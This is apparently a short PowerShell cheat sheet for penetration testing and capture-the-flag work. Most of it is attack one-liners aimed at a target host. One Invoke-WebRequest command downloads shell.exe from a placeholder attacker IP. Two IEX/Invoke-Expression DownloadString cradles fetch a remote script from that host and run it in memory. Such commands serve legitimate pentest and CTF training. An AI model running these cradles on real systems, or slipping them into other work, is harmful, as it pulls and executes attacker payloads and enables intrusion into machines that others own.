This new section is for all Microsoft Powershell-based techniques and syntax used during penetration testing and capture the flag.
PS >
$ENV:PROCESSOR_ARCHITECTURE
AMD64
PS> ls -Force
PS > Invoke-WebRequest -Uri "http://(ATTACKER IP ADDRESS)/shell.exe" -OutFile 'C:\path\to\writeable\dir\shell.exe'
The Invoke-Expression
cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. Without Invoke-Expression, a string submitted at the command line would be returned (echoed) unchanged.
PS C:\Target-System> IEX(New-Object Net.WebClient).downloadString('http://(ATTACKER IP ADDRESS)/(PowerShell Script).ps1')
OR
PS C:\Target-System> Invoke-Expression(New-Object Net.WebClient).downloadString('http://(ATTACKER IP ADDRESS)/(PowerShell Script).ps1')